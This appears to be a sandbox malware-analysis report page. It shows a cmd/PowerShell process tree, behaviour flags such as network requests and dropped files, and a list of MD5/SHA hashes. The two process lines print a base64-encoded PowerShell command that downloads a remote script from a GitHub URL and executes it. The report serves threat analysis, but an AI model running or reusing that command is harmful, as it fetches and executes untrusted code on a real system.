C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3924
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
27fd5c439f34483e003421637fb7df84
SHA1b114d704107b870cdb03c6039b4d0361aed4c99a
SHA256565db63b905460e0cea10a595e35326fb7207741038b36ba763a0aba52af7e3e
SHA512fcedf8648fe5b41afa2da5bbef7ce2938397ed69d5d0971c57a332abfb6d238e301882a9a716a151eff68bafd47b58e4d973f73aaac94d5d2b97b421d74e7719
-
MD5
9c485f1886db669ce0f18b4ae9ee3713
SHA13f69655ea5770c499b30b5da4d4fef7851ca4e81
SHA256d1f4a05a03430350b59584586ee66a52abd2b892be17e45357dd507db3e67bc6
SHA5125b381294f7a8885e7cdd726c57ba34a38d998b2216c02ae94f2a1faf703b2600fe2b45b8089543bb7da07d1499f332705c35eac7117376aea0ffde60b328c33b
-
MD5
a9176019ae2f0af22af200ca4f842b59
SHA122c13657a4210aca116ab63d2f806906dda954fd
SHA256af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739
SHA5125171e192c05a60aca06c5b4e12b69744f870a64d8c69289205f7aa082dbe1913cadd7fe4ab8d16f2d2d5eab0ebb687c68d5448b8a821c5912ec9670572d6ad3b
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
eb7bd0c44ed596ed0459a2a26b5e8265
SHA1ca50499dcfadb2f585f3b637ee7204af073e6403
SHA25646b16e117222c3d35cf3577fe05a4f53998173ccaf960d4c0841f781fd1486d0
SHA512759c010a5e21eb8ff19d48d95590c2d604ccb6f1ec72d213df485ada31f04bbce5f3b13b2fe8ce33c3d952bd977ecfe7b49e4aa35881fbea151ea52bd0d79c28
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
65ae6ee47c1d56a526558870af21cf6e
SHA16898bf425084ce3fd511332fbbf76cdb6a21e643
SHA25678ddcd3a68ec85c5ce0c52110a7d82bdb69f4d13e80fa9463774746db5e77cc3
SHA5121e2d803e404d294343e74510a120e026b0e14abd55b3a2577e67d663a17a94e615db593d447619d2331d2e148498782ed294c2aa121e2d6e6c391844951de704
-
MD5
9453615d542c9b0d521b429b9794e07d
SHA16c543926f7fcb171970bcca59a4fff36873a50a3
SHA256b59ab823d4ce1e90b39ac043ded78549b60c62b296c85b7c423d3494af220c34
SHA512b6816d54bc1790107293f304d3252d84ecb92c6d2fd4b017537329be1fada98322766109c1306d71540cda3ef7936e3f2c0eabd894a9f2fc56183b1add292c34
-
MD5
1b1412c2f9d041ad20da79f2d5a3b130
SHA18ac8f1a8c75daf1f150f6bb103c1ccc510067758
SHA256126438fadef33a97efa43b1339c5cb6e2b45dd81329381968da74909cc1aaa1f
SHA5123dbcc808c88d8098887f7a69e182d25c17aef23f3f1e7d5fc290792bb99be5a35f62169055fddf42a7082800ddd069ddfb3f2f2742d8687bab30065dc7fb74bc